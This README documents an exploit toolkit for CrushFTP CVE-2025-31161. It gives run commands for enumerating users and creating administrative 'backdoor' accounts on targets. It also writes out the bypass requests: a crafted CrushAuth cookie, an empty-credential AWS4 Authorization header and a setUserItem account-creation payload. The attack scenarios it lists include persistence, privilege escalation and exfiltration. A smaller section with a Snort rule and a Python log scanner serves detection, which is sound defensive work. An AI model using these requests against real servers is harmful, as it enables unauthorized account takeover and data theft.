# CrushFTP Authentication Bypass - CVE-2025-31161
[License: MIT](https://opensource.org/licenses/MIT) · [CVE-2025-31161](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161) · [Go](https://golang.org/) · [Bash](https://www.gnu.org/software/bash/)
A comprehensive toolkit for exploiting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP that allows unauthorized user account creation.
## 🔍 What is CVE-2025-31161?
CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP that allows attackers to create unauthorized user accounts without proper authentication. This vulnerability exists in the web interface's user management functionality.
### Technical Details
- **CVSS Score**: TBD
- **Affected Software**: CrushFTP Web Interface
- **Attack Vector**: Network
- **Authentication Required**: None
- **Impact**: Complete system compromise through unauthorized account creation
## 🚀 Features
- **Multi-Language Support**: Go and Bash implementations
- **Smart Vulnerability Detection**: Automatically checks if target is vulnerable before exploitation
- **User Enumeration**: List existing users on vulnerable targets
- **User Creation**: Create new administrative accounts
- **Interactive Mode**: Prompts for credentials only when target is confirmed vulnerable
- **Shorthand Flags**: Quick access with `-t`, `-p`, `-tu` flags
- **Custom Port Support**: Configurable port for different deployment scenarios
- **Educational Focus**: Designed for CTF challenges and security research
## 📁 Repository Structure
```
CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md # This documentation
├── cve-2025-31161.go # Go implementation (recommended)
├── cve-2025-31161.sh # Bash implementation
└── LICENSE # MIT License
```
## 🛠️ Installation & Requirements
### Prerequisites
#### For Go Version (Recommended)
```bash
# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
```
#### For Bash Version
```bash
# Requires curl (usually pre-installed)
sudo apt install curl
```
### Quick Setup
```bash
git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh
```
## 🎯 Usage
### Go Version (Recommended)
#### List Users
```bash
# Basic usage with shorthand flags
go run cve-2025-31161.go -t example.com -lu
# With custom port
go run cve-2025-31161.go -t example.com -p 8080 -lu
# Long form flags
go run cve-2025-31161.go --target_host example.com --port 8080 -lu
```
#### Add New User
```bash
# Create new user (will prompt for username/password)
go run cve-2025-31161.go -t example.com -au
# With custom target user (default: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au
# Long form flags
go run cve-2025-31161.go --target_host example.com --target_user admin -au
```
### Bash Version
#### List Users
```bash
# Basic usage
./cve-2025-31161.sh -t example.com -lu
# With custom port
./cve-2025-31161.sh -t example.com -p 8080 -lu
```
#### Add New User
```bash
# Create new user
./cve-2025-31161.sh -t example.com -au
# With custom settings
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au
```
### Available Flags
| Flag | Long Form | Description | Default |
|------|-----------|-------------|---------|
| `-t` | `--target_host` | Target hostname or IP (required) | - |
| `-p` | `--port` | Target port | 80 |
| `-tu` | `--target_user` | Target user for exploitation | crushadmin |
| `-lu` | `--list-users` | List existing users | - |
| `-au` | `--add-user` | Add new user (interactive) | - |
| | `--help` | Show help message | - |
### Usage Examples
```bash
# Example 1: Enumerate users on target
go run cve-2025-31161.go -t ftp.example.htb -lu
# Example 2: Create backdoor account
go run cve-2025-31161.go -t ftp.example.htb -au
# Then enter: username: backdoor, password: P@ssw0rd123
# Example 3: Non-standard port with user enumeration
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu
# View help
./cve-2025-31161.sh --help
```
## 🔄 How It Works
```mermaid
flowchart TD
A[Start Exploit] --> B[Check Target Connectivity]
B --> C{Target Reachable?}
C -->|No| D[Exit: Connection Failed]
C -->|Yes| E[Send getUserList Request]
E --> F{Response Contains OK?}
F -->|No| G[Exit: Not Vulnerable]
F -->|Yes| H[Target is Vulnerable!]
H --> I{Mode Selected?}
I -->|List Users -lu| J[Parse XML Response]
J --> K[Display User List]
K --> L[Exit: Success]
I -->|Add User -au| M[Prompt for Username]
M --> N[Prompt for Password]
N --> O[Send Warm-up Request]
O --> P[Craft User Creation Payload]
P --> Q[Send setUserItem Request]
Q --> R{User Created Successfully?}
R -->|Yes| S[Success: Account Created]
R -->|No| T[Failed: Exploitation Failed]
style A fill:#e1f5fe
style H fill:#c8e6c9
style K fill:#81c784
style S fill:#4caf50
style D fill:#ffcdd2
style G fill:#ffcdd2
style T fill:#ffcdd2
```
## 🧪 Exploit Flow Explained
### Step 1: Vulnerability Detection
The script first sends a `getUserList` request to check if the target is vulnerable:
```http
GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
```
If the response contains `<response_status>OK</response_status>`, the target is vulnerable.
### Step 2a: User Enumeration (List Users Mode)
When using the `-lu` flag, the script parses the XML response and extracts usernames:
```xml
<user_list type="vector">
<user_list_subitem>ben</user_list_subitem>
<user_list_subitem>crushadmin</user_list_subitem>
<user_list_subitem>default</user_list_subitem>
</user_list>
```
Output:
```
[+] Users:
- ben
- crushadmin
- default
```
### Step 2b: User Account Creation (Add User Mode)
When using the `-au` flag, the script sends a `setUserItem` request carrying a crafted XML payload in the POST body:
```http
POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded
command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If
```
### Step 3: Verification
The script checks for `<response_status>OK</response_status>` in the response to confirm successful user creation.
---
## ⚠️ Vulnerability Details
### Root Cause
The vulnerability stems from insufficient authentication checks in the CrushFTP web interface's user management functionality. The application accepts user creation requests without properly validating the caller's permissions.
### Impact Assessment
- **Confidentiality**: HIGH - Unauthorized access to file system
- **Integrity**: HIGH - Ability to modify/upload files
- **Availability**: MEDIUM - Potential for resource exhaustion
### Attack Scenarios
1. **Initial Access**: Create backdoor accounts for persistent access
2. **Privilege Escalation**: Create admin-level accounts
3. **Data Exfiltration**: Access sensitive files through FTP interface
4. **Lateral Movement**: Use compromised FTP server as pivot point
---
## 🛡️ Detection & Mitigation
### Detection Methods
- Monitor for unusual `setUserItem` requests in web logs
- Check for new user accounts created outside normal processes
- Implement anomaly detection for authentication bypass patterns
### Mitigation Strategies
1. **Immediate**: Block access to `/webinterface/function/` endpoints
2. **Short-term**: Update to patched CrushFTP version
3. **Long-term**: Implement proper authentication controls
### Network Signatures
```
# Snort/Suricata rule example. The setUserItem command is sent in the POST body
# (see Step 2b), so it is matched in http_client_body rather than http_uri.
alert http any any -> any any (msg:"CrushFTP CVE-2025-31161 Exploit Attempt"; flow:established,to_server; content:"/webinterface/function/"; http_uri; content:"setUserItem"; http_client_body; content:"serverGroup=MainUsers"; http_client_body; sid:1000001; rev:1;)
```
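The same detection points applied at the log level, as an added defender-side example that is not part of this repository: it scans constructed reverse-proxy log lines for the request shapes this README documents (user-management commands on `/webinterface/function/` and the Step 1 `Authorization` header whose `Credential=` ends right after the username). The JSON log format, field names and source addresses are assumptions.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (one JSON object per line, as a reverse proxy in front of CrushFTP might emit); not real traffic.
SAMPLE_LOG = """\
{"src":"10.0.0.5","method":"GET","uri":"/webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV","authorization":"AWS4-HMAC-SHA256 Credential=crushadmin/","body":""}
{"src":"10.0.0.5","method":"POST","uri":"/webinterface/function/","authorization":"AWS4-HMAC-SHA256 Credential=crushadmin/","body":"command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&xmlItem=user&c2f=31If"}
{"src":"10.0.0.9","method":"GET","uri":"/WebInterface/login.html","authorization":"","body":""}
{"src":"10.0.0.7","method":"POST","uri":"/webinterface/function/","authorization":"","body":"command=login&username=ben&password=x&c2f=aaaa"}
"""

# Commands used in the README's exploit flow: getUserList to probe, setUserItem to create.
USER_MGMT_COMMANDS = {"getUserList", "setUserItem"}
# Header shape from the README's Step 1 request: Credential=<user>/ with nothing after the slash.
BAD_AWS4_HEADER = re.compile(r"^AWS4-HMAC-SHA256 Credential=[^/\s]+/\s*$")


def request_params(entry):
    """Merge query-string and form-body parameters (first value wins)."""
    merged = {}
    for raw in (urlsplit(entry.get("uri", "")).query, entry.get("body", "")):
        for key, vals in parse_qs(raw, keep_blank_values=True).items():
            merged.setdefault(key, vals[0])
    return merged

def classify(entry):
    """Return the detection reasons for one log entry (empty list if benign)."""
    reasons = []
    if not entry.get("uri", "").lower().startswith("/webinterface/function/"):
        return reasons
    params = request_params(entry)
    cmd = params.get("command", "")
    if cmd in USER_MGMT_COMMANDS and params.get("serverGroup") == "MainUsers":
        reasons.append(f"user-management command {cmd} on MainUsers")
    if BAD_AWS4_HEADER.match(entry.get("authorization", "")):
        reasons.append("AWS4 Authorization header with empty credential scope")
    if cmd == "setUserItem" and params.get("data_action") == "replace":
        reasons.append(f"account write for username={params.get('username', '?')}")
    return reasons

def scan(log_text):
    """Return [(source, reasons)] for every entry that triggers at least one reason."""
    hits = []
    for line in filter(str.strip, log_text.splitlines()):
        entry = json.loads(line)
        reasons = classify(entry)
        if reasons:
            hits.append((entry["src"], reasons))
    return hits
```

Running `scan(SAMPLE_LOG)` flags only the two requests from `10.0.0.5`; the login page hit and the ordinary `login` command are left alone.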
---
## 🎓 Educational Use Cases
### CTF Scenarios
- **Web Application Security**: Understanding authentication bypass vulnerabilities
- **Penetration Testing**: Demonstrating real-world exploitation techniques
- **Red Team Exercises**: Simulating APT-style attacks
### Learning Objectives
- Understanding HTTP request manipulation
- XML injection techniques
- Authentication bypass methodologies
- Multi-language exploit development
## 🚨 Legal Disclaimer
⚠️ **IMPORTANT**: This tool is designed for:
- Educational purposes
- Authorized penetration testing
- CTF competitions
- Security research in controlled environments
**DO NOT USE** on systems without explicit written permission. Unauthorized access to computer systems is illegal and may result in severe legal consequences.
## 🤝 Contributing
Contributions are welcome! Please:
1. Fork the repository
2. Create a feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add new feature'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Create a Pull Request
### Development Guidelines
- Follow existing code style
- Add comprehensive comments
- Test on multiple target environments
- Update documentation for new features
## 📝 Version History
| Version | Date | Changes |
|---------|------|---------|
| 1.0.0 | 2025-01-XX | Initial release with Go and Bash implementations |
| 1.1.0 | 2025-01-XX | Interactive mode and vulnerability detection |
| 1.2.0 | 2025-10-02 | Added user enumeration (-lu), separate add user mode (-au), shorthand flags (-t, -p, -tu) |
## 📚 References
- [CVE-2025-31161 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
- [CrushFTP Official Website](https://www.crushftp.com/)
- [OWASP Authentication Bypass](https://owasp.org/www-community/attacks/Authentication_bypass)
- [Original Research by Immersive Labs](https://github.com/Immersive-Labs-Sec/CVE-2025-31161)
---
## 📧 Contact
For questions, suggestions, or security concerns, please open an issue in this repository.
File snapshot
[4.0K] /data/pocs/12e70c57808d0606fa170381ddbc49bc3de74ba9
├── [7.3K] cve-2025-31161.go
├── [7.5K] cve-2025-31161.sh
└── [ 10K] README.md
1 directory, 3 files